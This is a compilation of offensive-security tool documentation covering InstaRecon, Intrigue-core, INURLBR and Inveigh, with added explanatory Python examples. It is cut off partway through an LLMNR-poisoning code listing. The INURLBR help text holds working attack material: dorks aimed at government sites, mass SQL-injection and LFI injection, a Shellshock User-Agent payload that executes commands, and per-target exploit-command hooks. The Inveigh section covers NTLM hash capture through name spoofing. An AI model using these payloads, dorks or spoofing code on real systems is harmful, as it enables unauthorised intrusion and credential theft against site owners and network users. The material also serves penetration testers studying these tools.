192.30.253.11 - janky-chromium101-cp1-prd.iad.github.com
192.30.253.12 - gw.internaltools-esx2-cp1-prd.iad.github.com
192.30.253.13 - github-mon2ext-cp1-prd.iad.github.net
192.30.253.16 - github-smtp2a-ext-cp1-prd.iad.github.net
192.30.253.17 - github-smtp2b-ext-cp1-prd.iad.github.net
192.30.253.23 - ops-bastion1-cp1-prd.iad.github.com
192.30.253.30 - github-slowsmtp1-ext-cp1-prd.iad.github.net
192.30.254.1 - github-lb3a-cp1-prd.iad.github.com
192.30.254.2 - github-lb3b-cp1-prd.iad.github.com
192.30.254.3 - github-lb3c-cp1-prd.iad.github.com
192.30.254.4 - github-lb3d-cp1-prd.iad.github.com
# Saving output csv file
# Done

Download InstaRecon
INTRIGUE - INTELLIGENCE GATHERING FRAMEWORK

Intrigue-core is an API-first intelligence gathering framework for Internet reconnaissance and research.

Setting up a development environment

The following are presumed available and configured in your environment:
redis
sudo
nmap
zmap
masscan
java runtime
Sudo is used to run certain commands (masscan, zmap, nmap) as root, so make sure the following sudoers entry does not require a password:
your-username ALL = NOPASSWD: /usr/bin/masscan, /usr/sbin/zmap, /usr/bin/nmap
Be aware that passwordless sudo for nmap amounts to passwordless root for that account (nmap runs arbitrary NSE Lua scripts as root), so give this entry to a dedicated unprivileged service user rather than your personal login, and keep the binary paths absolute as shown.

Starting up...

Make sure you have redis installed and running. (Use Homebrew if you're on OSX.)
Install all gem dependencies with Bundler (http://bundler.io/)
$ bundle install

Start the web and background workers. Intrigue will start on 127.0.0.1:7777.
$ foreman start

Now, browse to the web interface.

Using the web interface

To use the web interface, browse to http://127.0.0.1:7777
Getting started should be pretty straightforward: try running a "dns_brute_sub" task on your domain. Now, try with the "use_file" option set to true.

API usage via core-cli:

A command line utility has been added for convenience, core-cli.

List all available tasks:
$ bundle exec ./core-cli.rb list

Start a task:
$ bundle exec ./core-cli.rb start dns_lookup_forward DnsRecord#intrigue.io

Start a task with options:
$ bundle exec ./core-cli.rb start dns_brute_sub DnsRecord#intrigue.io resolver=8.8.8.8#brute_list=1,2,3,4,www#use_permutations=true
[+] Starting task
[+] Task complete!
[+] Start Results
DnsRecord#www.intrigue.io
IpAddress#192.0.78.13
[ ] End Results
[+] Task Log:
[ ] : Got allowed option: resolver
[ ] : Allowed option:
{:name=>"resolver", :type=>"String", :regex=>"ip_address"
, :default=>"8.8.8.8"}
[ ] : Regex should match an IP Address
[ ] : No need to convert resolver to a string
[+] : Allowed user_option! {"name"=>"resolver",
"value"=>"8.8.8.8"}
[ ] : Got allowed option: brute_list
[ ] : Allowed option:
{:name=>"brute_list", :type=>"String", :regex=>"alpha_num
eric_list", :default=>["mx", "mx1", "mx2", "www", "ww2",
"ns1", "ns2", "ns3", "test", "mail", "owa", "vpn",
"admin", "intranet", "gateway", "secure", "admin",
"service", "tools", "doc", "docs", "network", "help",
"en", "sharepoint", "portal", "public", "private", "pub",
"zeus", "mickey", "time", "web", "it", "my", "photos",
"safe", "download", "dl", "search", "staging"]}
[ ] : Regex should match an alpha-numeric list
[ ] : No need to convert brute_list to a string
[+] : Allowed user_option! {"name"=>"brute_list",
"value"=>"1,2,3,4,www"}

[ ] : Got allowed option: use_permutations
[ ] : Allowed option:
{:name=>"use_permutations", :type=>"Boolean", :regex=>"bo
olean", :default=>true}
[ ] : Regex should match a boolean
[+] : Allowed user_option! {"name"=>"use_permutations",
"value"=>true}
[ ] : user_options: [{"resolver"=>"8.8.8.8"},
{"brute_list"=>"1,2,3,4,www"},
{"use_permutations"=>true}]
[ ] : Task: dns_brute_sub
[ ] : Id: fddc7313-52f6-4d5a-9aad-fd39b0428ca5
[ ] : Task entity: {"type"=>"DnsRecord",
"attributes"=>{"name"=>"intrigue.io"}}
[ ] : Task options: [{"resolver"=>"8.8.8.8"},
{"brute_list"=>"1,2,3,4,www"},
{"use_permutations"=>true}]
[ ] : Option configured: resolver=8.8.8.8
[ ] : Option configured: use_file=false
[ ] : Option configured: brute_file=dns_sub.list
[ ] : Option configured: use_mashed_domains=false
[ ] : Option configured: brute_list=1,2,3,4,www
[ ] : Option configured: use_permutations=true
[ ] : Using provided brute list
[+] : Using subdomain list: ["1", "2", "3", "4", "www"]
[+] : Looks like no wildcard dns. Moving on.
[-] : Hit exception: no address for 1.intrigue.io
[-] : Hit exception: no address for 2.intrigue.io
[-] : Hit exception: no address for 3.intrigue.io
[-] : Hit exception: no address for 4.intrigue.io

[+] : Resolved Address 192.0.78.13 for www.intrigue.io
[+] : Creating entity: DnsRecord,
{:name=>"www.intrigue.io"}
[+] : Creating entity: IpAddress, {:name=>"192.0.78.13"}
[ ] : Adding permutations: www1, www2
[-] : Hit exception: no address for www1.intrigue.io
[-] : Hit exception: no address for www2.intrigue.io
[+] : Ship it!
[ ] : Sending to Webhook: http://localhost:7777/v1/
task_runs/fddc7313-52f6-4d5a-9aad-fd39b0428ca5
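The task log above shows two steps that the CLI arguments alone do not explain: the wildcard check ("Looks like no wildcard dns") that has to run before any brute forcing, because a zone with a *.domain record answers every guessed name, and the permutation step (www -> www1, www2) applied to each hit. The following is an added example, not intrigue-core's Ruby implementation; it is written in Python with an injectable resolver so the wildcard and permutation logic can be exercised offline. The names brute_subdomains and wildcard_address are the example's own, and the default resolver uses the operating system's stub resolver rather than the task's resolver=8.8.8.8 option.

```python
import random
import socket
import string
from typing import Callable, Dict, List, Optional, Sequence, Tuple

Resolve = Callable[[str], Optional[str]]   # name -> first A record, or None on NXDOMAIN


def system_resolve(name: str) -> Optional[str]:
    """Forward lookup through the operating system's resolver."""
    try:
        return socket.gethostbyname(name)
    except (socket.gaierror, OSError):
        return None


def wildcard_address(domain: str, resolve: Resolve, label_len: int = 12) -> Optional[str]:
    """Resolve a random label under domain. An answer means the zone has a
    wildcard record, so every brute-forced name will 'resolve'; hits that
    return this same address must be discarded as false positives."""
    label = "".join(random.choice(string.ascii_lowercase) for _ in range(label_len))
    return resolve(f"{label}.{domain}")


def brute_subdomains(domain: str, brute_list: Sequence[str],
                     resolve: Resolve = system_resolve,
                     use_permutations: bool = True,
                     suffixes: Sequence[str] = ("1", "2")) -> Tuple[Dict[str, str], Optional[str]]:
    """Return ({fqdn: address}, wildcard_address_or_None).
    Each hit is expanded with numeric suffixes (www -> www1, www2) when
    use_permutations is set, mirroring the 'Adding permutations' log line."""
    wildcard = wildcard_address(domain, resolve)
    found: Dict[str, str] = {}
    queue: List[str] = list(brute_list)
    tried = set()
    while queue:
        label = queue.pop(0)
        if label in tried:
            continue
        tried.add(label)
        name = f"{label}.{domain}"
        addr = resolve(name)
        if addr is None or addr == wildcard:
            continue          # NXDOMAIN, or only the wildcard answering
        found[name] = addr
        if use_permutations:
            queue.extend(label + s for s in suffixes)
    return found, wildcard


if __name__ == "__main__":
    # Constructed answers standing in for the resolver; swap in
    # system_resolve (the default) to run against a real zone.
    fake_zone = {"www.intrigue.io": "192.0.78.13"}
    hits, wc = brute_subdomains("intrigue.io", ["1", "2", "3", "4", "www"], resolve=fake_zone.get)
    print("wildcard:", wc)
    for fqdn, ip in hits.items():
        print(f"Resolved Address {ip} for {fqdn}")
```

A limitation worth knowing: the wildcard filter compares addresses, so a real host that happens to share the wildcard's address is dropped too. Comparing the full answer set (all A records, or CNAME target) instead of one address narrows that gap.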

Check for a list of subdomains on intrigue.io:
$ bundle exec ./core-cli.rb start dns_brute_sub DnsRecord#intrigue.io resolver=8.8.8.8#brute_list=a,b,c,proxy,test,www

Run the dns_brute_sub task against the Alexa top 1000 domains (data/domains.txt):
$ for x in `cat data/domains.txt | head -n 1000`; do bundle exec ./core-cli.rb start dns_brute_sub DnsRecord#$x; done

API usage via rubygem

$ gem install intrigue
$ irb
> require 'intrigue'
> x = Intrigue.new

# Create an entity hash, must have a :type key
# and (in the case of most tasks) an :attributes key
# with a hash containing a :name key (as shown below)
> entity = {
    :type => "String",
    :attributes => { :name => "intrigue.io" }
  }
# Create a list of options (this can be empty)
> options_list = [
    { :name => "resolver", :value => "8.8.8.8" }
  ]
# Start the task, keeping the returned task run id
> id = x.start "example", entity, options_list
> puts x.get_log id
> puts x.get_result id

API usage via curl:

You can use the tried and true curl utility to request a task run. Specify the task type, an entity, and the appropriate options:
$ curl -s -X POST -H "Content-Type: application/json" -d '{ "task": "example", "entity": { "type": "String", "attributes": { "name": "8.8.8.8" } }, "options": {} }' http://127.0.0.1:7777/v1/task_runs

Download Intrigue-core
INURLBR - ADVANCED SEARCH IN MULTIPLE SEARCH ENGINES

Advanced search in search engines; enables analysis of the results to exploit GET / POST, capturing emails & URLs, with an internal custom validation junction for each target / URL found.
INURLBR scanner was developed by Cleiton Pinheiro, owner and founder of INURL - BRASIL.
A tool made in PHP that runs on different Linux distributions and helps hackers / security professionals in their specific searches. It automates several exploration methods, and the scanner is known for its ease of use and performance.
The inspiration to create the inurlbr scanner was the XROOT Scan 5.2 application.

Long description
The INURLBR tool was developed to meet the needs of the hacking community.
Purpose: make advanced searches to find potential vulnerabilities in web applications (known as Google Hacking) with various options and search filters; the tool draws on 24 search engines plus 6 special (deep web) engines.
- Possibility to generate IP ranges or random IPs and analyze them as targets.
- Customization of HTTP header, User-Agent and URL referer.
- Execution of external commands to exploit certain targets.
- Random dork generator, or a dork file.
- Option to set a proxy, a proxy list file, an HTTP proxy, or an HTTP proxy list file.
- Set the interval at which the proxy is rotated.
- Possible to use TOR with a random IP.
- Debug of URL processing, HTTP requests and the IRC process.
- Communication with an IRC server, sending vulnerable URLs to a chat room.
- Possibility to inject exploits via GET / POST => SQLI, LFI, LFD.
- Filtering and validation based on regular expressions.
- Extraction of emails and URLs.
- Validation using HTTP code.
- Search pages based on a strings file.
- Exploit command manager.
- Paging limiter on search engines.
- Beep sound when a vulnerability is found.
- Use a text file as the data source for URL tests.
- Find custom strings in the return values of the tests.
- Validation of the Shellshock vulnerability.
- Validation of WordPress wp-config.php values.
- Execution of sub-validation processes.
- Validation of database and programming syntax errors.
- Data encoding as a native parameter.
- Random Google host.
- Port scan.
- Error checking & values:

LIB & PERMISSION:
PHP Version 5.4.7
php5-curl LIB
php5-cli LIB
cURL support enabled
cURL Information 7.24.0
allow_url_fopen On
permission Reading & Writing
User root privilege, or is in the sudoers group (searching itself needs neither; since the --command-* options execute external commands on URLs returned by third parties, running the scanner as an unprivileged user is the safer choice)
Operating system LINUX
Proxy random TOR
PERMISSION EXECUTION: chmod +x inurlbr.php
INSTALLING LIB CURL: sudo apt-get install php5-curl
INSTALLING LIB CLI: sudo apt-get install php5-cli
INSTALLING PROXY TOR: https://www.torproject.org/docs/debian.html.en

resume: apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl

Help:
-h / --help     Alternative long length help command.
--ajuda         Command to specify help.
--info          Information about the script.
--update        Code update.
-q              Choose which search engine you want through [1...24] / [e1..e6]:
  [options]:
  1  - GOOGLE / (CSE) GENERIC RANDOM / API
  2  - BING
  3  - YAHOO BR
  4  - ASK
  5  - HAO123 BR
  6  - GOOGLE (API)
  7  - LYCOS
  8  - UOL BR
  9  - YAHOO US
  10 - SAPO
  11 - DMOZ
  12 - GIGABLAST
  13 - NEVER
  14 - BAIDU BR
  15 - YANDEX
  16 - ZOO
  17 - HOTBOT
  18 - ZHONGSOU
  19 - HKSEARCH
  20 - EZILION
  21 - SOGOU
  22 - DUCK DUCK GO
  23 - BOOROW
  24 - GOOGLE(CSE) GENERIC RANDOM
  --------------------------------------- SPECIAL MOTORS ---------------------------------------
  e1 - TOR FIND
  e2 - ELEPHANT
  e3 - TORSEARCH
  e4 - WIKILEAKS
  e5 - OTN
  e6 - EXPLOITS SHODAN
  ---------------------------------------
  all - All search engines / not special motors
  Default:
  Example: -q {op}
  Usage:
  -q 1
  -q 5
  Using more than one engine:
  -q 1,2,5,6,11,24
  Using all engines:
  -q all

--proxy         Choose which proxy you want to use through the search engine:
  Example: --proxy {proxy:port}
  Usage:
  --proxy localhost:8118
  --proxy socks5://googleinurl@localhost:9050
  --proxy http://admin:12334@172.16.0.90:8080
--proxy-file    Set a source file to randomize your proxy for each search engine.
  Example: --proxy-file {proxys}
  Usage:
  --proxy-file proxys_list.txt
--time-proxy    Set how often the proxy will be exchanged.
  Example: --time-proxy {second}
  Usage:
  --time-proxy 10
--proxy-http-file  Set a file with HTTP proxy URLs, used to bypass the search engines' CAPTCHAs.
  Example: --proxy-http-file {youfilehttp}
  Usage:
  --proxy-http-file http_proxys.txt
--tor-random    Enables the TOR function; each use links to a unique IP.
-t              Choose the validation type: op 1, 2, 3, 4, 5
  [options]:
  1 - The first type uses the default errors considered by the script:
      It establishes a connection with the exploit through the GET method.
      Demo: www.alvo.com.br/pasta/index.php?id={exploit}
  2 - The second type tries to validate the error defined by: -a='VALUE_INSIDE_THE_TARGET'
      It also establishes a connection with the exploit through the GET method.
      Demo: www.alvo.com.br/pasta/index.php?id={exploit}
  3 - The third type combines both the first and second types:
      Then, of course, it also establishes a connection with the exploit through the GET method.
      Demo: www.target.com.br{exploit}
  4 - The fourth type is a validation based on a source file, with the scanner's standard functions enabled.
      The source file values are concatenated with the target URL.
      - Set your target with the command --target {http://target}
      - Set your file with the command -o {file}
      Explanation:
      Source file values:
      /admin/index.php?id=
      /pag/index.php?id=
      /brazil.php?new=
      Demo:
      www.target.com.br/admin/index.php?id={exploit}
      www.target.com.br/pag/index.php?id={exploit}
      www.target.com.br/brazil.php?new={exploit}
  5 - (FIND PAGE) The fifth type of validation is based on the source file.
      Only one check is enabled: HTTP code 200 from the target server; a URL that returns that code is considered vulnerable.
      - Set your target with the command --target {http://target}
      - Set your file with the command -o {file}
      Explanation:
      Source file values:
      /admin/admin.php
      /admin.asp
      /admin.aspx
      Demo:
      www.target.com.br/admin/admin.php
      www.target.com.br/admin.asp
      www.target.com.br/admin.aspx
      Observation: URLs that return code 200 are written to a separate section of the output file. (A 200 alone is a weak signal: many sites answer 200 with a custom "not found" page, so combine this type with -a, --regexp or --ifredirect before trusting a hit.)
  Default:
  Example: -t {op}
  Usage:
  -t 1
  DEFAULT ERRORS:
  [*]JAVA INFINITYDB, [*]LOCAL FILE INCLUSION, [*]ZIMBRA MAIL, [*]ERROR MARIADB,
  [*]ERROR JBOSSWEB, [*]ERROR ODBC, [*]ZEND FRAMEWORK, [*]ERROR MYSQL,
  [*]ERROR MICROSOFT, [*]ERROR POSTGRESQL, [*]ERROR JAVA INFINITYDB, [*]ERROR PHP,
  [*]CMS WORDPRESS, [*]ERROR JDBC, [*]ERROR ASP, [*]ERROR ORACLE, CFM,
  [*]SHELL WEB, [*]ERROR DB2, [*]JDBC, [*]ERROR LUA, [*]ERROR INDEFINITE

--dork          Defines which dork the search engine will use.
  Example: --dork {dork}
  Usage:
  --dork 'site:.gov.br inurl:php? id'
  - Using multiple dorks:
  Example: --dork {[DORK]dork1[DORK]dork2[DORK]dork3}
  Usage:
  --dork '[DORK]site:br[DORK]site:ar inurl:php[DORK]site:il inurl:asp'
--dork-file     Set a source file with your search dorks.
  Example: --dork-file {dork_file}
  Usage:
  --dork-file 'dorks.txt'
--exploit-get   Defines which exploit will be injected through the GET method into each URL found.
  Example: --exploit-get {exploit_get}
  Usage:
  --exploit-get "?'%270x27;"
--exploit-post  Defines which exploit will be injected through the POST method into each URL found.
  Example: --exploit-post {exploit_post}
  Usage:
  --exploit-post 'field1=valor1&field2=valor2&field3=?0x273exploit;&botao=ok'
--exploit-command  Defines which exploit/parameter will be executed in the options --command-vul / --command-all.
  The exploit-command is referenced in the parameters --command-vul / --command-all as _EXPLOIT_
  Ex: --exploit-command '/admin/config.conf' --command-all 'curl -v _TARGET__EXPLOIT_'
  _TARGET_ is the specified URL/TARGET obtained by the process.
  _EXPLOIT_ is the exploit/parameter defined by the option --exploit-command.
  Example: --exploit-command {exploit-command}
  Usage:
  --exploit-command '/admin/config.conf'
-a              Specify the string that will be searched for in the response (validation types 2 and 3):
  Example: -a {string}
  Usage:
  -a '<title>hello world</title>'
-d              Specify the debug level: op 1, 2, 3, 4, 5, 6.
  Example: -d {op}
  Usage:
  -d 1 /URL of the search engine.
  -d 2 /Show all the URLs.
  -d 3 /Detailed request of every URL.
  -d 4 /Shows the HTML of every URL.
  -d 5 /Detailed request of all URLs.
  -d 6 /Detailed PING - PONG irc.
-s              Specify the output file where the vulnerable URLs will be saved.
  Example: -s {file}
  Usage:
  -s your_file.txt
-o              Manually manage the URLs you want to test from a file, without using a search engine.
  Example: -o {file_where_my_urls_are}
  Usage:
  -o tests.txt
--persist       Attempts when Google blocks your search. The script tries another Google host / default = 4
  Example: --persist {number_attempts}
  Usage:
  --persist 7
--ifredirect    Validation method based on the REDIRECT_URL returned after the request.
  Example: --ifredirect {string_validation}
  Usage:
  --ifredirect '/admin/painel.php'
-m              Enable the search for emails on the URLs specified.
-u              Enable the search for URL lists on the URLs specified.
--gc            Enable validation of values with Google webcache.
--pr            Progressive scan: searches one dork, validates its results, then moves on to the next dork, one at a time.
--file-cookie   Open cookie file.
--save-as       Save results in a certain place.
--shellshock    Exploit the Shellshock vulnerability by setting a malicious User-Agent.
--popup         Run --command-all or --command-vul in a parallel terminal.
--cms-check     Enable a simple check of whether the URL / target is using a CMS.
--no-banner     Remove the script presentation banner.
--unique        Filter results to unique domains.
--beep          Beep sound when a vulnerability is found.
--alexa-rank    Show Alexa positioning in the results.
--robots        Show the values of the robots.txt file.
--range         Set an IP range.
  Example: --range {range_start#range_end}
  Usage:
  --range '172.16.0.5#172.16.0.255'
--range-rand    Set the amount of random IPs.
  Example: --range-rand {rand}
  Usage:
  --range-rand '50'
--irc           Send vulnerable URLs to an IRC server / channel.
  Example: --irc {server#channel}
  Usage:
  --irc 'irc.rizon.net#inurlbrasil'
--http-header   Set HTTP header.
  Example: --http-header {header}
  Usage:
  --http-header 'HTTP/1.1 401 Unauthorized,WWW-Authenticate: Basic realm="Top Secret"'
--sedmail       Send vulnerable URLs to an email address.
  Example: --sedmail {youemail}
  Usage:
  --sedmail youemail@inurl.com.br
--delay         Delay between research processes.
  Example: --delay {second}
  Usage:
  --delay 10
--time-out      Timeout to exit the process.
  Example: --time-out {second}
  Usage:
  --time-out 10
--ifurl         Filter URLs based on their argument.
  Example: --ifurl {ifurl}
  Usage:
  --ifurl index.php?id=
--ifcode        Validate results based on the returned HTTP code.
  Example: --ifcode {ifcode}
  Usage:
  --ifcode 200
--ifemail       Filter emails based on their argument.
  Example: --ifemail {string}
  Usage:
  --ifemail sp.gov.br
--url-reference Define the referring URL sent in the request against the target.
  Example: --url-reference {url}
  Usage:
  --url-reference http://target.com/admin/user/valid.php
--mp            Limits the number of pages in the search engines.
  Example: --mp {limit}
  Usage:
  --mp 50
--user-agent    Define the User-Agent used in the request against the target.
  Example: --user-agent {agent}
  Usage:
  --user-agent 'Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11'
  Usage-exploit / SHELLSHOCK:
  --user-agent '() { foo;};echo; /bin/bash -c "expr 299663299665 / 3; echo CMD:;id; echo END_CMD:;"'
  Complete command:
  php inurlbr.php --dork '_YOU_DORK_' -s shellshock.txt --user-agent '_YOU_AGENT_XPL_SHELLSHOCK' -t 2 -a '99887766555'
  (The -a value is the result of the expr in the payload, so validation type 2 only marks a target as vulnerable when the injected command actually executed, rather than on the presence of the string in a static page.)
--sall          Saves all URLs found by the scanner.
  Example: --sall {file}
  Usage:
  --sall your_file.txt
--command-vul   Every vulnerable URL found will execute this command.
  Example: --command-vul {command}
  Usage:
  --command-vul 'nmap -sV -p 22,80,21 _TARGET_'
  --command-vul './exploit.sh _TARGET_ output.txt'
  --command-vul 'php miniexploit.php -t _TARGET_ -s output.txt'
--command-all   Use this command to specify a single command to run for EVERY URL found.
  Example: --command-all {command}
  Usage:
  --command-all 'nmap -sV -p 22,80,21 _TARGET_'
  --command-all './exploit.sh _TARGET_ output.txt'
  --command-all 'php miniexploit.php -t _TARGET_ -s output.txt'
  [!] Observation:
  _TARGET_ will be replaced by the URL/target found; if the user doesn't supply the GET part, only the domain is used.
  _TARGETFULL_ will be replaced by the original URL / target found.
  _TARGETXPL_ will be replaced by the original URL / target found + the --exploit-get EXPLOIT.
  _TARGETIP_ returns the IP of the URL / target found.
  _URI_ returns the folder path of the URL / target found.
  _RANDOM_ Random strings.
  _PORT_ Captures the port of the current test, within the --port-scan process.
  _EXPLOIT_ will be replaced by the argument of --exploit-command.
  The exploit-command is referenced in the parameters --command-vul / --command-all as _EXPLOIT_
  Note that the substituted values come from search-engine results or from the target itself, so every command template runs on attacker-influenced input.
--replace       Replace values in the target URL.
  Example: --replace {value_old[INURL]value_new}
  Usage:
  --replace 'index.php?id=[INURL]index.php?id=1666+and+(SELECT+user,Password+from+mysql.user+limit+0,1)=1'
  --replace 'main.php?id=[INURL]main.php?id=1+and+substring(@@version,1,1)=1'
  --replace 'index.aspx?id=[INURL]index.aspx?id=1%27'
--remove        Remove values in the target URL.
  Example: --remove {string}
  Usage:
  --remove '/admin.php?id=0'
--regexp        Use a regular expression to validate results; the expression is matched against the target/URL response.
  Example: --regexp {regular_expression}
  All Major Credit Cards:
  Usage:
  --regexp '(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|6011[0-9]{12}|3(?:0[0-5]|[68][0-9])[0-9]{11}|3[47][0-9]{13})'
  IP Addresses:
  Usage:
  --regexp '((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))'
  EMAIL:
  Usage:
  --regexp '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'
--regexp-filter Use a regular expression to filter results; the expression is matched against the target/URL response.
  Example: --regexp-filter {regular_expression}
  EMAIL:
  Usage:
  --regexp-filter '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'

[!] Small commands manager:
--exploit-cad   Register a command for use within the scanner.
  Format: {TYPE_EXPLOIT}::{EXPLOIT_COMMAND}
  Example Format: NMAP::nmap -sV _TARGET_
  Example Format: EXPLOIT1::php xpl.php -t _TARGET_ -s output.txt
  Usage:
  --exploit-cad 'NMAP::nmap -sV _TARGET_'
  Observation: Each registered command is identified by its array id. Commands are logged in the exploits.conf file.
--exploit-all-id  Execute registered commands/exploits by id; (all) runs for each target found by the engine.
  Example: --exploit-all-id {id,id}
  Usage:
  --exploit-all-id 1,2,8,22
--exploit-vul-id  Execute registered commands/exploits by id; (vul) runs the command only if the target was considered vulnerable.
  Example: --exploit-vul-id {id,id}
  Usage:
  --exploit-vul-id 1,2,8,22
--exploit-list  List all command entries in the exploits.conf file.

[!] Running subprocesses:
--sub-file      The subprocess injects strings into the URLs found by the engine, via GET or POST.
  Example: --sub-file {youfile}
  Usage:
  --sub-file exploits_get.txt
--sub-get       Defines that the strings coming from --sub-file will be injected via GET.
  Usage:
  --sub-get
--sub-post      Defines that the strings coming from --sub-file will be injected via POST.
  Usage:
  --sub-post
--sub-cmd-vul   Each vulnerable URL found within the subprocess will execute this command.
  Example: --sub-cmd-vul {command}
  Usage:
  --sub-cmd-vul 'nmap -sV -p 22,80,21 _TARGET_'
  --sub-cmd-vul './exploit.sh _TARGET_ output.txt'
  --sub-cmd-vul 'php miniexploit.php -t _TARGET_ -s output.txt'
--sub-cmd-all   Run a command for each target found within the subprocess scope.
  Example: --sub-cmd-all {command}
  Usage:
  --sub-cmd-all 'nmap -sV -p 22,80,21 _TARGET_'
  --sub-cmd-all './exploit.sh _TARGET_ output.txt'
  --sub-cmd-all 'php miniexploit.php -t _TARGET_ -s output.txt'
--port-scan     Defines the ports that will be checked for being open.
  Example: --port-scan {ports}
  Usage:
  --port-scan '22,21,23,3306'
--port-cmd      Define the command that runs when an open port is found.
  Example: --port-cmd {command}
  Usage:
  --port-cmd './xpl _TARGETIP_:_PORT_'
  --port-cmd './xpl _TARGETIP_/file.php?sqli=1'
--port-write    Send values to the port.
  Example: --port-write {'value0','value1','value3'}
  Usage:
  --port-write "'NICK nk_test','USER nk_test 8 * :_ola','JOIN #inurlbrasil','PRIVMSG #inurlbrasil :minha_msg'"

[!] Modifying values used within script parameters:

md5 Hash the value with MD5.
Example: md5({value})
Usage:
md5(102030)
Usage:
--exploit-get 'user?id=md5(102030)'

base64 Encode the value in base64.
Example: base64({value})
Usage:
base64(102030)
Usage:
--exploit-get 'user?id=base64(102030)'

hex Encode the value as hex.
Example: hex({value})
Usage:
hex(102030)
Usage:
--exploit-get 'user?id=hex(102030)'

random Generate a random value.
Example: random({character_counter})
Usage:
random(8)
Usage:
--exploit-get 'user?id=random(8)'
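The two mechanisms described above, the {TYPE_EXPLOIT}::{EXPLOIT_COMMAND} registry with its _TARGET_ placeholder and the md5()/base64()/hex()/random() value modifiers, are shown together in the following added example. It is not INURLBR's code (INURLBR is PHP); the registry entries are the hypothetical ones from the help text, and the modifier expansion and argv construction are this example's own design. The security point it makes is that a command registered with _TARGET_ should be split into an argv list before the target is substituted, so that a hostile value harvested from a search result never reaches a shell.

```python
import base64
import hashlib
import re
import secrets
import shlex
import string

# Matches the md5()/base64()/hex()/random() modifiers described above.
MODIFIER_RE = re.compile(r"\b(md5|base64|hex|random)\(([^()]*)\)")


def expand_modifiers(value: str) -> str:
    """Replace each modifier call in a parameter string with its computed value."""
    def repl(m):
        func, arg = m.group(1), m.group(2)
        if func == "md5":
            return hashlib.md5(arg.encode()).hexdigest()   # MD5 is a hash, not encryption
        if func == "base64":
            return base64.b64encode(arg.encode()).decode()
        if func == "hex":
            return arg.encode().hex()
        alphabet = string.ascii_letters + string.digits      # random(N): N alphanumerics
        return "".join(secrets.choice(alphabet) for _ in range(int(arg)))
    return MODIFIER_RE.sub(repl, value)


def parse_exploit_entry(line: str):
    """Parse one {TYPE_EXPLOIT}::{EXPLOIT_COMMAND} entry into (name, command)."""
    name, sep, command = line.partition("::")
    if not sep or not name.strip() or not command.strip():
        raise ValueError(f"malformed exploit entry: {line!r}")
    return name.strip(), command.strip()


def load_registry(text: str):
    """Read exploits.conf-style text; the id of an entry is its index in the list."""
    return [parse_exploit_entry(l) for l in text.splitlines() if l.strip()]


def build_argv(command: str, target: str):
    """Substitute _TARGET_ into an already-split argv, so the target is never shell-parsed.

    Substituting into the command string and then handing it to a shell would let
    a crafted target such as 'example.com; rm -rf /' run extra commands.
    """
    argv = shlex.split(command)
    if not any("_TARGET_" in a for a in argv):
        raise ValueError("command has no _TARGET_ placeholder")
    return [a.replace("_TARGET_", target) for a in argv]


if __name__ == "__main__":
    # Constructed registry in the format the help text describes (hypothetical entries).
    registry = load_registry(
        "NMAP::nmap -sV _TARGET_\n"
        "EXPLOIT1::php xpl.php -t _TARGET_ -s output.txt\n"
    )
    for exploit_id, (name, cmd) in enumerate(registry):
        print(exploit_id, name, build_argv(cmd, "example.com; id"))
    print(expand_modifiers("user?id=md5(102030)&tok=random(8)"))
    # subprocess.run(build_argv(cmd, target)) would execute an entry without a shell.
```

With the hostile target above, build_argv yields ['nmap', '-sV', 'example.com; id']: the whole string becomes one argument to nmap, which fails to resolve it, instead of a second command.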

Usage
To get a list of basic options and switches use:
php inurlbr.php -h

To get a list of all options and switches use:
php inurlbr.php --help

Download INURLBR
INVEIGH - A WINDOWS POWERSHELL LLMNR/NBNS SPOOFER WITH
CHALLENGE/RESPONSE CAPTURE OVER HTTP/SMB

Inveigh is a Windows PowerShell LLMNR/NBNS spoofer


designed to assist penetration testers that find themselves
limited to a Windows system. This can commonly occur while
performing phishing attacks, USB drive attacks, VLAN pivoting,
or simply being restricted to a Windows system as part of client
imposed restrictions.
Notes

1. Currently supports IPv4 LLMNR/NBNS spoofing and


HTTP/SMB NTLMv1/NTLMv2 challenge/response
capture.
2. LLMNR/NBNS spoofing is performed through sniffing and
sending with raw sockets.
3. SMB challenge/response captures are performed by
sniffing over the host system's SMB service.
4. HTTP challenge/response captures are performed with a

dedicated listener.
5. The local LLMNR/NBNS services do not need to be
disabled on the host system.
6. LLMNR/NBNS spoofer will point victims to host system's
SMB service, keep account lockout scenarios in mind.
7. SMB authentication should fall back from Kerberos to NTLM,
because the spoofed hostnames are not valid in DNS and no
Kerberos ticket can be obtained for them.
8. Ensure that the LLMNR, NBNS, SMB and HTTP ports are open
within any local firewall on the host system.
9. Output files will be created in current working directory.
10. If you copy/paste challenge/response captures from
output window for password cracking, remove carriage
returns.
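Inveigh is PowerShell, but the LLMNR mechanics behind notes 1 and 2 (sniff a name query, answer it with the host's own address) are easiest to see in a few lines of Python. The following is an added example, not Inveigh's code: it parses a single-question LLMNR query and builds the poisoned answer. The query bytes are constructed test data; poison_loop is a hypothetical helper that assumes root and nothing else bound to UDP 5355 on the host, whereas Inveigh uses raw sockets and therefore, per note 5, does not need the local LLMNR service disabled.

```python
import socket
import struct

LLMNR_GROUP = "224.0.0.252"   # IPv4 LLMNR multicast group
LLMNR_PORT = 5355
QTYPE_A = 1
QCLASS_IN = 1


def encode_name(name: str) -> bytes:
    """DNS-style label encoding: length-prefixed labels, terminated by a zero byte."""
    out = b""
    for label in name.split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def parse_llmnr_query(packet: bytes) -> dict:
    """Parse a single-question LLMNR query (same wire layout as a DNS query)."""
    if len(packet) < 12:
        raise ValueError("packet too short for an LLMNR header")
    tid, flags, qdcount, _an, _ns, _ar = struct.unpack("!HHHHHH", packet[:12])
    if flags & 0x8000 or qdcount != 1:
        raise ValueError("not a single-question query")
    labels, pos = [], 12
    while True:
        length = packet[pos]
        pos += 1
        if length == 0:
            break
        if length & 0xC0:
            raise ValueError("compressed names are not handled by this parser")
        labels.append(packet[pos:pos + length].decode("ascii"))
        pos += length
    qtype, qclass = struct.unpack("!HH", packet[pos:pos + 4])
    return {
        "id": tid,
        "name": ".".join(labels),
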